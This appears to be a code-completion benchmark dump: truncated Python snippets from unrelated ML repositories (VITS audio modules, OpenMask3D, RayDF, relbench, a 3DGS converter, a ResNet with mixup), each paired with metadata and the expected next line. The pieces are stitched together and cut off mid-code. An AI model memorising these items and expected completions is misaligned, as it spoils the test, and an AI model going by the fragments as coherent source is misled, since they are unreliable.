"--dist",
type=str,
default="loadscope",
help="The distribution mode for pytest-xdist",
)
args = parser.parse_args()
if args.download and not args.path:
args.path = "DOWNLOAD_ONLY"
if not args.path:
print(
f"Please provide the path to a {file_name} file. "
f"Use the --help flag for more information."
)
exit(1)
return Args(
path=args.path,
headless=args.headless,
intent=args.intent,
id=args.id,
domain=args.domain,
category=args.category,
subcategory=args.subcategory,
skip=args.skip,
single_browser_instance=args.single_browser_instance,
type=args.type,
test=args.test,
download=args.download,
count=args.count, | pytest_args=PytestArgs( | 8 | 2023-10-30 16:40:57+00:00 | 4k |
innnky/ar-vits | module/modules.py | [
{
"identifier": "commons",
"path": "module/commons.py",
"snippet": "def init_weights(m, mean=0.0, std=0.01):\ndef get_padding(kernel_size, dilation=1):\ndef convert_pad_shape(pad_shape):\ndef intersperse(lst, item):\ndef kl_divergence(m_p, logs_p, m_q, logs_q):\ndef rand_gumbel(shape):\ndef rand_gumbel_... | import math
import numpy as np
import torch
import torch.distributions as D
from torch import nn
from torch.nn import functional as F
from torch.nn import Conv1d
from torch.nn.utils import weight_norm, remove_weight_norm
from module import commons
from module.commons import init_weights, get_padding
from module.transforms import piecewise_rational_quadratic_transform | 2,402 | self.n_layers = n_layers
self.p_dropout = p_dropout
self.drop = nn.Dropout(p_dropout)
self.convs_sep = nn.ModuleList()
self.convs_1x1 = nn.ModuleList()
self.norms_1 = nn.ModuleList()
self.norms_2 = nn.ModuleList()
for i in range(n_layers):
dilation = kernel_size ** i
padding = (kernel_size * dilation - dilation) // 2
self.convs_sep.append(nn.Conv1d(channels, channels, kernel_size,
groups=channels, dilation=dilation, padding=padding
))
self.convs_1x1.append(nn.Conv1d(channels, channels, 1))
self.norms_1.append(LayerNorm(channels))
self.norms_2.append(LayerNorm(channels))
def forward(self, x, x_mask, g=None):
if g is not None:
x = x + g
for i in range(self.n_layers):
y = self.convs_sep[i](x * x_mask)
y = self.norms_1[i](y)
y = F.gelu(y)
y = self.convs_1x1[i](y)
y = self.norms_2[i](y)
y = F.gelu(y)
y = self.drop(y)
x = x + y
return x * x_mask
class WN(torch.nn.Module):
def __init__(self, hidden_channels, kernel_size, dilation_rate, n_layers, gin_channels=0, p_dropout=0):
super(WN, self).__init__()
assert(kernel_size % 2 == 1)
self.hidden_channels =hidden_channels
self.kernel_size = kernel_size,
self.dilation_rate = dilation_rate
self.n_layers = n_layers
self.gin_channels = gin_channels
self.p_dropout = p_dropout
self.in_layers = torch.nn.ModuleList()
self.res_skip_layers = torch.nn.ModuleList()
self.drop = nn.Dropout(p_dropout)
if gin_channels != 0:
cond_layer = torch.nn.Conv1d(gin_channels, 2*hidden_channels*n_layers, 1)
self.cond_layer = torch.nn.utils.weight_norm(cond_layer, name='weight')
for i in range(n_layers):
dilation = dilation_rate ** i
padding = int((kernel_size * dilation - dilation) / 2)
in_layer = torch.nn.Conv1d(hidden_channels, 2*hidden_channels, kernel_size,
dilation=dilation, padding=padding)
in_layer = torch.nn.utils.weight_norm(in_layer, name='weight')
self.in_layers.append(in_layer)
# last one is not necessary
if i < n_layers - 1:
res_skip_channels = 2 * hidden_channels
else:
res_skip_channels = hidden_channels
res_skip_layer = torch.nn.Conv1d(hidden_channels, res_skip_channels, 1)
res_skip_layer = torch.nn.utils.weight_norm(res_skip_layer, name='weight')
self.res_skip_layers.append(res_skip_layer)
def forward(self, x, x_mask, g=None, **kwargs):
output = torch.zeros_like(x)
n_channels_tensor = torch.IntTensor([self.hidden_channels])
if g is not None:
g = self.cond_layer(g)
for i in range(self.n_layers):
x_in = self.in_layers[i](x)
if g is not None:
cond_offset = i * 2 * self.hidden_channels
g_l = g[:,cond_offset:cond_offset+2*self.hidden_channels,:]
else:
g_l = torch.zeros_like(x_in)
acts = commons.fused_add_tanh_sigmoid_multiply(
x_in,
g_l,
n_channels_tensor)
acts = self.drop(acts)
res_skip_acts = self.res_skip_layers[i](acts)
if i < self.n_layers - 1:
res_acts = res_skip_acts[:,:self.hidden_channels,:]
x = (x + res_acts) * x_mask
output = output + res_skip_acts[:,self.hidden_channels:,:]
else:
output = output + res_skip_acts
return output * x_mask
def remove_weight_norm(self):
if self.gin_channels != 0:
torch.nn.utils.remove_weight_norm(self.cond_layer)
for l in self.in_layers:
torch.nn.utils.remove_weight_norm(l)
for l in self.res_skip_layers:
torch.nn.utils.remove_weight_norm(l)
class ResBlock1(torch.nn.Module):
def __init__(self, channels, kernel_size=3, dilation=(1, 3, 5)):
super(ResBlock1, self).__init__()
self.convs1 = nn.ModuleList([
weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[0],
padding=get_padding(kernel_size, dilation[0]))),
weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[1],
padding=get_padding(kernel_size, dilation[1]))),
weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[2],
padding=get_padding(kernel_size, dilation[2])))
])
|
LRELU_SLOPE = 0.1
class LayerNorm(nn.Module):
def __init__(self, channels, eps=1e-5):
super().__init__()
self.channels = channels
self.eps = eps
self.gamma = nn.Parameter(torch.ones(channels))
self.beta = nn.Parameter(torch.zeros(channels))
def forward(self, x):
x = x.transpose(1, -1)
x = F.layer_norm(x, (self.channels,), self.gamma, self.beta, self.eps)
return x.transpose(1, -1)
class ConvReluNorm(nn.Module):
def __init__(self, in_channels, hidden_channels, out_channels, kernel_size, n_layers, p_dropout):
super().__init__()
self.in_channels = in_channels
self.hidden_channels = hidden_channels
self.out_channels = out_channels
self.kernel_size = kernel_size
self.n_layers = n_layers
self.p_dropout = p_dropout
assert n_layers > 1, "Number of layers should be larger than 0."
self.conv_layers = nn.ModuleList()
self.norm_layers = nn.ModuleList()
self.conv_layers.append(nn.Conv1d(in_channels, hidden_channels, kernel_size, padding=kernel_size//2))
self.norm_layers.append(LayerNorm(hidden_channels))
self.relu_drop = nn.Sequential(
nn.ReLU(),
nn.Dropout(p_dropout))
for _ in range(n_layers-1):
self.conv_layers.append(nn.Conv1d(hidden_channels, hidden_channels, kernel_size, padding=kernel_size//2))
self.norm_layers.append(LayerNorm(hidden_channels))
self.proj = nn.Conv1d(hidden_channels, out_channels, 1)
self.proj.weight.data.zero_()
self.proj.bias.data.zero_()
def forward(self, x, x_mask):
x_org = x
for i in range(self.n_layers):
x = self.conv_layers[i](x * x_mask)
x = self.norm_layers[i](x)
x = self.relu_drop(x)
x = x_org + self.proj(x)
return x * x_mask
class DDSConv(nn.Module):
"""
Dialted and Depth-Separable Convolution
"""
def __init__(self, channels, kernel_size, n_layers, p_dropout=0.):
super().__init__()
self.channels = channels
self.kernel_size = kernel_size
self.n_layers = n_layers
self.p_dropout = p_dropout
self.drop = nn.Dropout(p_dropout)
self.convs_sep = nn.ModuleList()
self.convs_1x1 = nn.ModuleList()
self.norms_1 = nn.ModuleList()
self.norms_2 = nn.ModuleList()
for i in range(n_layers):
dilation = kernel_size ** i
padding = (kernel_size * dilation - dilation) // 2
self.convs_sep.append(nn.Conv1d(channels, channels, kernel_size,
groups=channels, dilation=dilation, padding=padding
))
self.convs_1x1.append(nn.Conv1d(channels, channels, 1))
self.norms_1.append(LayerNorm(channels))
self.norms_2.append(LayerNorm(channels))
def forward(self, x, x_mask, g=None):
if g is not None:
x = x + g
for i in range(self.n_layers):
y = self.convs_sep[i](x * x_mask)
y = self.norms_1[i](y)
y = F.gelu(y)
y = self.convs_1x1[i](y)
y = self.norms_2[i](y)
y = F.gelu(y)
y = self.drop(y)
x = x + y
return x * x_mask
class WN(torch.nn.Module):
def __init__(self, hidden_channels, kernel_size, dilation_rate, n_layers, gin_channels=0, p_dropout=0):
super(WN, self).__init__()
assert(kernel_size % 2 == 1)
self.hidden_channels =hidden_channels
self.kernel_size = kernel_size,
self.dilation_rate = dilation_rate
self.n_layers = n_layers
self.gin_channels = gin_channels
self.p_dropout = p_dropout
self.in_layers = torch.nn.ModuleList()
self.res_skip_layers = torch.nn.ModuleList()
self.drop = nn.Dropout(p_dropout)
if gin_channels != 0:
cond_layer = torch.nn.Conv1d(gin_channels, 2*hidden_channels*n_layers, 1)
self.cond_layer = torch.nn.utils.weight_norm(cond_layer, name='weight')
for i in range(n_layers):
dilation = dilation_rate ** i
padding = int((kernel_size * dilation - dilation) / 2)
in_layer = torch.nn.Conv1d(hidden_channels, 2*hidden_channels, kernel_size,
dilation=dilation, padding=padding)
in_layer = torch.nn.utils.weight_norm(in_layer, name='weight')
self.in_layers.append(in_layer)
# last one is not necessary
if i < n_layers - 1:
res_skip_channels = 2 * hidden_channels
else:
res_skip_channels = hidden_channels
res_skip_layer = torch.nn.Conv1d(hidden_channels, res_skip_channels, 1)
res_skip_layer = torch.nn.utils.weight_norm(res_skip_layer, name='weight')
self.res_skip_layers.append(res_skip_layer)
def forward(self, x, x_mask, g=None, **kwargs):
output = torch.zeros_like(x)
n_channels_tensor = torch.IntTensor([self.hidden_channels])
if g is not None:
g = self.cond_layer(g)
for i in range(self.n_layers):
x_in = self.in_layers[i](x)
if g is not None:
cond_offset = i * 2 * self.hidden_channels
g_l = g[:,cond_offset:cond_offset+2*self.hidden_channels,:]
else:
g_l = torch.zeros_like(x_in)
acts = commons.fused_add_tanh_sigmoid_multiply(
x_in,
g_l,
n_channels_tensor)
acts = self.drop(acts)
res_skip_acts = self.res_skip_layers[i](acts)
if i < self.n_layers - 1:
res_acts = res_skip_acts[:,:self.hidden_channels,:]
x = (x + res_acts) * x_mask
output = output + res_skip_acts[:,self.hidden_channels:,:]
else:
output = output + res_skip_acts
return output * x_mask
def remove_weight_norm(self):
if self.gin_channels != 0:
torch.nn.utils.remove_weight_norm(self.cond_layer)
for l in self.in_layers:
torch.nn.utils.remove_weight_norm(l)
for l in self.res_skip_layers:
torch.nn.utils.remove_weight_norm(l)
class ResBlock1(torch.nn.Module):
def __init__(self, channels, kernel_size=3, dilation=(1, 3, 5)):
super(ResBlock1, self).__init__()
self.convs1 = nn.ModuleList([
weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[0],
padding=get_padding(kernel_size, dilation[0]))),
weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[1],
padding=get_padding(kernel_size, dilation[1]))),
weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[2],
padding=get_padding(kernel_size, dilation[2])))
]) | self.convs1.apply(init_weights) | 1 | 2023-10-30 04:40:19+00:00 | 4k |
OpenMask3D/openmask3d | openmask3d/mask_features_computation/features_extractor.py | [
{
"identifier": "Camera",
"path": "openmask3d/data/load.py",
"snippet": "class Camera:\n def __init__(self, \n intrinsic_path, \n intrinsic_resolution, \n poses_path, \n depths_path, \n extension_depth, \n ... | import clip
import numpy as np
import imageio
import torch
import os
from tqdm import tqdm
from openmask3d.data.load import Camera, InstanceMasks3D, Images, PointCloud, get_number_of_images
from openmask3d.mask_features_computation.utils import initialize_sam_model, mask2box_multi_level, run_sam | 3,157 | visible_points_view = np.zeros((len(indices), n_points), dtype = bool)
print(f"[INFO] Computing the visible points in each view.")
for i, idx in tqdm(enumerate(indices)): # for each view
# *******************************************************************************************************************
# STEP 1: get the projected points
# Get the coordinates of the projected points in the i-th view (i.e. the view with index idx)
projected_points_not_norm = (intrinsic @ poses[i] @ X.T).T
# Get the mask of the points which have a non-null third coordinate to avoid division by zero
mask = (projected_points_not_norm[:, 2] != 0) # don't do the division for point with the third coord equal to zero
# Get non homogeneous coordinates of valid points (2D in the image)
projected_points[i][mask] = np.column_stack([[projected_points_not_norm[:, 0][mask]/projected_points_not_norm[:, 2][mask],
projected_points_not_norm[:, 1][mask]/projected_points_not_norm[:, 2][mask]]]).T
# *******************************************************************************************************************
# STEP 2: occlusions computation
# Load the depth from the sensor
depth_path = os.path.join(depths_path, str(idx) + '.png')
sensor_depth = imageio.imread(depth_path) / depth_scale
inside_mask = (projected_points[i,:,0] >= 0) * (projected_points[i,:,1] >= 0) \
* (projected_points[i,:,0] < width) \
* (projected_points[i,:,1] < height)
pi = projected_points[i].T
# Depth of the points of the pointcloud, projected in the i-th view, computed using the projection matrices
point_depth = projected_points_not_norm[:,2]
# Compute the visibility mask, true for all the points which are visible from the i-th view
visibility_mask = (np.abs(sensor_depth[pi[1][inside_mask], pi[0][inside_mask]]
- point_depth[inside_mask]) <= \
vis_threshold).astype(bool)
inside_mask[inside_mask == True] = visibility_mask
visible_points_view[i] = inside_mask
return visible_points_view, projected_points, resolution
def get_bbox(self, mask, view):
if(self.visible_points_in_view_in_mask[view][mask].sum()!=0):
true_values = np.where(self.visible_points_in_view_in_mask[view, mask])
valid = True
t, b, l, r = true_values[0].min(), true_values[0].max()+1, true_values[1].min(), true_values[1].max()+1
else:
valid = False
t, b, l, r = (0,0,0,0)
return valid, (t, b, l, r)
def get_visible_points_in_view_in_mask(self):
masks = self.masks
num_view = len(self.indices)
visible_points_view, projected_points, resolution = self.get_visible_points_view()
visible_points_in_view_in_mask = np.zeros((num_view, masks.num_masks, resolution[0], resolution[1]), dtype=bool)
print(f"[INFO] Computing the visible points in each view in each mask.")
for i in tqdm(range(num_view)):
for j in range(masks.num_masks):
visible_masks_points = (masks.masks[:,j] * visible_points_view[i]) > 0
proj_points = projected_points[i][visible_masks_points]
if(len(proj_points) != 0):
visible_points_in_view_in_mask[i][j][proj_points[:,1], proj_points[:,0]] = True
self.visible_points_in_view_in_mask = visible_points_in_view_in_mask
self.visible_points_view = visible_points_view
self.projected_points = projected_points
self.resolution = resolution
return visible_points_in_view_in_mask, visible_points_view, projected_points, resolution
def get_top_k_indices_per_mask(self, k):
num_points_in_view_in_mask = self.visible_points_in_view_in_mask.sum(axis=2).sum(axis=2)
topk_indices_per_mask = np.argsort(-num_points_in_view_in_mask, axis=0)[:k,:].T
return topk_indices_per_mask
class FeaturesExtractor:
def __init__(self,
camera,
clip_model,
images,
masks,
pointcloud,
sam_model_type,
sam_checkpoint,
vis_threshold,
device):
self.camera = camera
self.images = images
self.device = device
self.point_projector = PointProjector(camera, pointcloud, masks, vis_threshold, images.indices)
self.predictor_sam = initialize_sam_model(device, sam_model_type, sam_checkpoint)
self.clip_model, self.clip_preprocess = clip.load(clip_model, device)
def extract_features(self, topk, multi_level_expansion_ratio, num_levels, num_random_rounds, num_selected_points, save_crops, out_folder, optimize_gpu_usage=False):
if(save_crops):
out_folder = os.path.join(out_folder, "crops")
os.makedirs(out_folder, exist_ok=True)
topk_indices_per_mask = self.point_projector.get_top_k_indices_per_mask(topk)
num_masks = self.point_projector.masks.num_masks
mask_clip = np.zeros((num_masks, 768)) #initialize mask clip
np_images = self.images.get_as_np_list()
for mask in tqdm(range(num_masks)): # for each mask
images_crops = []
if(optimize_gpu_usage):
self.clip_model.to(torch.device('cpu'))
self.predictor_sam.model.cuda()
for view_count, view in enumerate(topk_indices_per_mask[mask]): # for each view
if(optimize_gpu_usage):
torch.cuda.empty_cache()
# Get original mask points coordinates in 2d images
point_coords = np.transpose(np.where(self.point_projector.visible_points_in_view_in_mask[view][mask] == True))
if (point_coords.shape[0] > 0):
self.predictor_sam.set_image(np_images[view])
# SAM
best_mask = run_sam(image_size=np_images[view],
num_random_rounds=num_random_rounds,
num_selected_points=num_selected_points,
point_coords=point_coords,
predictor_sam=self.predictor_sam,)
# MULTI LEVEL CROPS
for level in range(num_levels):
# get the bbox and corresponding crops
|
class PointProjector:
def __init__(self, camera: Camera,
point_cloud: PointCloud,
masks: InstanceMasks3D,
vis_threshold,
indices):
self.vis_threshold = vis_threshold
self.indices = indices
self.camera = camera
self.point_cloud = point_cloud
self.masks = masks
self.visible_points_in_view_in_mask, self.visible_points_view, self.projected_points, self.resolution = self.get_visible_points_in_view_in_mask()
def get_visible_points_view(self):
# Initialization
vis_threshold = self.vis_threshold
indices = self.indices
depth_scale = self.camera.depth_scale
poses = self.camera.load_poses(indices)
X = self.point_cloud.get_homogeneous_coordinates()
n_points = self.point_cloud.num_points
depths_path = self.camera.depths_path
resolution = imageio.imread(os.path.join(depths_path, '0.png')).shape
height = resolution[0]
width = resolution[1]
intrinsic = self.camera.get_adapted_intrinsic(resolution)
projected_points = np.zeros((len(indices), n_points, 2), dtype = int)
visible_points_view = np.zeros((len(indices), n_points), dtype = bool)
print(f"[INFO] Computing the visible points in each view.")
for i, idx in tqdm(enumerate(indices)): # for each view
# *******************************************************************************************************************
# STEP 1: get the projected points
# Get the coordinates of the projected points in the i-th view (i.e. the view with index idx)
projected_points_not_norm = (intrinsic @ poses[i] @ X.T).T
# Get the mask of the points which have a non-null third coordinate to avoid division by zero
mask = (projected_points_not_norm[:, 2] != 0) # don't do the division for point with the third coord equal to zero
# Get non homogeneous coordinates of valid points (2D in the image)
projected_points[i][mask] = np.column_stack([[projected_points_not_norm[:, 0][mask]/projected_points_not_norm[:, 2][mask],
projected_points_not_norm[:, 1][mask]/projected_points_not_norm[:, 2][mask]]]).T
# *******************************************************************************************************************
# STEP 2: occlusions computation
# Load the depth from the sensor
depth_path = os.path.join(depths_path, str(idx) + '.png')
sensor_depth = imageio.imread(depth_path) / depth_scale
inside_mask = (projected_points[i,:,0] >= 0) * (projected_points[i,:,1] >= 0) \
* (projected_points[i,:,0] < width) \
* (projected_points[i,:,1] < height)
pi = projected_points[i].T
# Depth of the points of the pointcloud, projected in the i-th view, computed using the projection matrices
point_depth = projected_points_not_norm[:,2]
# Compute the visibility mask, true for all the points which are visible from the i-th view
visibility_mask = (np.abs(sensor_depth[pi[1][inside_mask], pi[0][inside_mask]]
- point_depth[inside_mask]) <= \
vis_threshold).astype(bool)
inside_mask[inside_mask == True] = visibility_mask
visible_points_view[i] = inside_mask
return visible_points_view, projected_points, resolution
def get_bbox(self, mask, view):
if(self.visible_points_in_view_in_mask[view][mask].sum()!=0):
true_values = np.where(self.visible_points_in_view_in_mask[view, mask])
valid = True
t, b, l, r = true_values[0].min(), true_values[0].max()+1, true_values[1].min(), true_values[1].max()+1
else:
valid = False
t, b, l, r = (0,0,0,0)
return valid, (t, b, l, r)
def get_visible_points_in_view_in_mask(self):
masks = self.masks
num_view = len(self.indices)
visible_points_view, projected_points, resolution = self.get_visible_points_view()
visible_points_in_view_in_mask = np.zeros((num_view, masks.num_masks, resolution[0], resolution[1]), dtype=bool)
print(f"[INFO] Computing the visible points in each view in each mask.")
for i in tqdm(range(num_view)):
for j in range(masks.num_masks):
visible_masks_points = (masks.masks[:,j] * visible_points_view[i]) > 0
proj_points = projected_points[i][visible_masks_points]
if(len(proj_points) != 0):
visible_points_in_view_in_mask[i][j][proj_points[:,1], proj_points[:,0]] = True
self.visible_points_in_view_in_mask = visible_points_in_view_in_mask
self.visible_points_view = visible_points_view
self.projected_points = projected_points
self.resolution = resolution
return visible_points_in_view_in_mask, visible_points_view, projected_points, resolution
def get_top_k_indices_per_mask(self, k):
num_points_in_view_in_mask = self.visible_points_in_view_in_mask.sum(axis=2).sum(axis=2)
topk_indices_per_mask = np.argsort(-num_points_in_view_in_mask, axis=0)[:k,:].T
return topk_indices_per_mask
class FeaturesExtractor:
def __init__(self,
camera,
clip_model,
images,
masks,
pointcloud,
sam_model_type,
sam_checkpoint,
vis_threshold,
device):
self.camera = camera
self.images = images
self.device = device
self.point_projector = PointProjector(camera, pointcloud, masks, vis_threshold, images.indices)
self.predictor_sam = initialize_sam_model(device, sam_model_type, sam_checkpoint)
self.clip_model, self.clip_preprocess = clip.load(clip_model, device)
def extract_features(self, topk, multi_level_expansion_ratio, num_levels, num_random_rounds, num_selected_points, save_crops, out_folder, optimize_gpu_usage=False):
if(save_crops):
out_folder = os.path.join(out_folder, "crops")
os.makedirs(out_folder, exist_ok=True)
topk_indices_per_mask = self.point_projector.get_top_k_indices_per_mask(topk)
num_masks = self.point_projector.masks.num_masks
mask_clip = np.zeros((num_masks, 768)) #initialize mask clip
np_images = self.images.get_as_np_list()
for mask in tqdm(range(num_masks)): # for each mask
images_crops = []
if(optimize_gpu_usage):
self.clip_model.to(torch.device('cpu'))
self.predictor_sam.model.cuda()
for view_count, view in enumerate(topk_indices_per_mask[mask]): # for each view
if(optimize_gpu_usage):
torch.cuda.empty_cache()
# Get original mask points coordinates in 2d images
point_coords = np.transpose(np.where(self.point_projector.visible_points_in_view_in_mask[view][mask] == True))
if (point_coords.shape[0] > 0):
self.predictor_sam.set_image(np_images[view])
# SAM
best_mask = run_sam(image_size=np_images[view],
num_random_rounds=num_random_rounds,
num_selected_points=num_selected_points,
point_coords=point_coords,
predictor_sam=self.predictor_sam,)
# MULTI LEVEL CROPS
for level in range(num_levels):
# get the bbox and corresponding crops | x1, y1, x2, y2 = mask2box_multi_level(torch.from_numpy(best_mask), level, multi_level_expansion_ratio) | 6 | 2023-10-31 14:58:50+00:00 | 4k |
nv-tlabs/vid2player3d | poselib/poselib/visualization/tests/test_plotter.py | [
{
"identifier": "BasePlotterTask",
"path": "poselib/poselib/visualization/core.py",
"snippet": "class BasePlotterTask(object):\n _task_name: str # unique name of the task\n _task_type: str # type of the task is used to identify which callable\n\n def __init__(self, task_name: str, task_type: ... | from typing import cast
from ..core import BasePlotterTask, BasePlotterTasks
from ..plt_plotter import Matplotlib3DPlotter
from ..simple_plotter_tasks import Draw3DDots, Draw3DLines
import matplotlib.pyplot as plt
import numpy as np | 2,517 |
task = Draw3DLines(task_name="test",
lines=np.array([[[0, 0, 0], [0, 0, 1]], [[0, 1, 1], [0, 1, 0]]]), color="blue")
task2 = Draw3DDots(task_name="test2",
dots=np.array([[0, 0, 0], [0, 0, 1], [0, 1, 1], [0, 1, 0]]), color="red")
task3 = BasePlotterTasks([task, task2])
|
task = Draw3DLines(task_name="test",
lines=np.array([[[0, 0, 0], [0, 0, 1]], [[0, 1, 1], [0, 1, 0]]]), color="blue")
task2 = Draw3DDots(task_name="test2",
dots=np.array([[0, 0, 0], [0, 0, 1], [0, 1, 1], [0, 1, 0]]), color="red")
task3 = BasePlotterTasks([task, task2]) | plotter = Matplotlib3DPlotter(cast(BasePlotterTask, task3)) | 0 | 2023-10-30 20:43:43+00:00 | 4k |
vLAR-group/RayDF | run_mv.py | [
{
"identifier": "config_parser",
"path": "config.py",
"snippet": "def config_parser():\n parser = configargparse.ArgumentParser()\n parser.add_argument('--config', is_config_file=True,\n help='config file path')\n parser.add_argument(\"--eval_only\", action='store_true',\... | import os
import torch
import numpy as np
import imageio
import trimesh
import open3d as o3d
import wandb
from tqdm import trange
from config import config_parser
from open3d import pipelines
from wandb import AlertLevel
from utils import log
from utils.math import convert_d
from utils.dataloader import Dataloader
from utils.ray import get_ray_param
from net_multiview.network import create_net
from net_multiview.sampler import get_multiview_rays
from utils.math import get_surface_gradient, get_surface_normal
from torchmetrics.functional import peak_signal_noise_ratio as PSNR
from torchmetrics.functional import structural_similarity_index_measure as SSIM
from torchmetrics.image.lpip import LearnedPerceptualImagePatchSimilarity
from chamfer_distance import ChamferDistance | 3,453 |
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
torch.backends.cudnn.benchmark = True
np.random.seed(0)
LPIPS = LearnedPerceptualImagePatchSimilarity(net_type='alex').to(device)
CD = ChamferDistance().to(device)
def train(args):
# Load dataset
dataloader = Dataloader(args, device)
# Create rayparam function and network
|
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
torch.backends.cudnn.benchmark = True
np.random.seed(0)
LPIPS = LearnedPerceptualImagePatchSimilarity(net_type='alex').to(device)
CD = ChamferDistance().to(device)
def train(args):
# Load dataset
dataloader = Dataloader(args, device)
# Create rayparam function and network | ray_fn, global_step, model, model_cls, optimizer, scheduler = create_net(args, dataloader.scene_info, device) | 5 | 2023-10-30 14:05:51+00:00 | 4k |
snap-stanford/relbench | test/external/test_graph.py | [
{
"identifier": "FakeDataset",
"path": "relbench/datasets/fake.py",
"snippet": "class FakeDataset(Dataset):\n name = \"rel-fake\"\n\n def __init__(\n self, num_products: int = 30, num_customers: int = 100, num_reviews: int = 500\n ):\n db = self.make_db(num_products, num_customers... | from torch_frame import TensorFrame
from torch_frame.config import TextEmbedderConfig
from torch_frame.testing.text_embedder import HashTextEmbedder
from relbench.datasets import FakeDataset
from relbench.external.graph import get_stype_proposal, make_pkey_fkey_graph | 1,922 |
def test_make_pkey_fkey_graph():
dataset = FakeDataset()
data = make_pkey_fkey_graph(
dataset.db,
|
def test_make_pkey_fkey_graph():
dataset = FakeDataset()
data = make_pkey_fkey_graph(
dataset.db, | get_stype_proposal(dataset.db), | 1 | 2023-10-29 18:29:52+00:00 | 4k |
francescofugazzi/3dgsconverter | gsconverter/utils/conversion_functions.py | [
{
"identifier": "Format3dgs",
"path": "gsconverter/utils/format_3dgs.py",
"snippet": "class Format3dgs(BaseConverter):\n def to_cc(self, process_rgb=True):\n debug_print(\"[DEBUG] Starting conversion from 3DGS to CC...\")\n \n # Load vertices from the provided data\n verti... | import numpy as np
from .format_3dgs import Format3dgs
from .format_cc import FormatCC
from .format_parquet import FormatParquet
from .utility_functions import debug_print
from .data_processing import process_data # Place this import statement at the top with other imports | 2,662 | """
3D Gaussian Splatting Converter
Copyright (c) 2023 Francesco Fugazzi
This software is released under the MIT License.
For more information about the license, please see the LICENSE file.
"""
def convert(data, source_format, target_format, **kwargs):
| """
3D Gaussian Splatting Converter
Copyright (c) 2023 Francesco Fugazzi
This software is released under the MIT License.
For more information about the license, please see the LICENSE file.
"""
def convert(data, source_format, target_format, **kwargs): | debug_print(f"[DEBUG] Starting conversion from {source_format} to {target_format}...") | 3 | 2023-10-28 15:09:50+00:00 | 4k |
solangii/MICS | models/network/resnet18.py | [
{
"identifier": "to_one_hot",
"path": "utils/mixup_utils.py",
"snippet": "def to_one_hot(inp, num_classes):\n y_onehot = torch.FloatTensor(inp.size(0), num_classes)\n y_onehot.zero_()\n\n y_onehot.scatter_(1, inp.unsqueeze(1).data.cpu(), 1)\n\n return Variable(y_onehot.cuda(), requires_grad=... | import torch
import torch.nn as nn
import errno
import hashlib
import os
import warnings
import re
import shutil
import sys
import tempfile
import numpy as np
import random
from tqdm import tqdm
from urllib.request import urlopen
from urllib.parse import urlparse
from utils.mixup_utils import to_one_hot, middle_mixup_process, get_lambda
from torch.autograd import Variable | 3,449 | out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
identity = self.downsample(x)
out += identity
out = self.relu(out)
return out
class ResNet(nn.Module):
def __init__(self, block, layers, num_classes=1000, zero_init_residual=False,
groups=1, width_per_group=64, replace_stride_with_dilation=None,
norm_layer=None, avg_downsample=False):
super(ResNet, self).__init__()
if norm_layer is None:
norm_layer = nn.BatchNorm2d
self._norm_layer = norm_layer
self.inplanes = 64
self.num_classes = num_classes
self.dilation = 1
self.avg_downsample = avg_downsample
if replace_stride_with_dilation is None:
# each element in the tuple indicates if we should replace
# the 2x2 stride with a dilated convolution instead
replace_stride_with_dilation = [False, False, False]
if len(replace_stride_with_dilation) != 3:
raise ValueError("replace_stride_with_dilation should be None "
"or a 3-element tuple, got {}".format(replace_stride_with_dilation))
self.groups = groups
self.base_width = width_per_group
if avg_downsample:
self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=7, stride=1, padding=3, bias=False)
else:
self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=7, stride=2, padding=3, bias=False)
self.bn1 = norm_layer(self.inplanes)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2,
dilate=replace_stride_with_dilation[0])
self.layer3 = self._make_layer(block, 256, layers[2], stride=2,
dilate=replace_stride_with_dilation[1])
self.layer4 = self._make_layer(block, 512, layers[3], stride=2,
dilate=replace_stride_with_dilation[2])
self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
# self.fc = nn.Linear(512 * block.expansion, num_classes,bias=False)
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
# Zero-initialize the last BN in each residual branch,
# so that the residual branch starts with zeros, and each residual block behaves like an identity.
# This improves the model by 0.2~0.3% according to https://arxiv.org/abs/1706.02677
if zero_init_residual:
for m in self.modules():
if isinstance(m, Bottleneck):
nn.init.constant_(m.bn3.weight, 0)
elif isinstance(m, BasicBlock):
nn.init.constant_(m.bn2.weight, 0)
def _make_layer(self, block, planes, blocks, stride=1, dilate=False):
norm_layer = self._norm_layer
downsample = None
previous_dilation = self.dilation
if dilate:
self.dilation *= stride
stride = 1
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
conv1x1(self.inplanes, planes * block.expansion, stride),
norm_layer(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample, self.groups,
self.base_width, previous_dilation, norm_layer, self.avg_downsample))
self.inplanes = planes * block.expansion
for _ in range(1, blocks):
layers.append(block(self.inplanes, planes, groups=self.groups,
base_width=self.base_width, dilation=self.dilation,
norm_layer=norm_layer))
return nn.Sequential(*layers)
def forward(self, x, target=None, mix_type="vanilla", mixup_alpha=None, num_base_classes=-1,
use_hard_positive_aug=False, add_noise_level=0., mult_noise_level=0., minimum_lambda=0.5,
hpa_type="none", label_sharpening=True, label_mix="vanilla", label_mix_threshold=0.2,
exp_coef=1., cutmix_prob=1., num_similar_class=3, classifiers=None,
gaussian_h1=0.2, piecewise_linear_h1=0.5, piecewise_linear_h2=0., use_softlabel=True):
if "mixup_hidden" in mix_type:
layer_mix = random.randint(0, 3)
else:
layer_mix = None
out = x
if mixup_alpha is not None:
lam = get_lambda(mixup_alpha)
# https://github.com/YU1ut/MixMatch-pytorch/blob/master/train.py#L243
if use_hard_positive_aug:
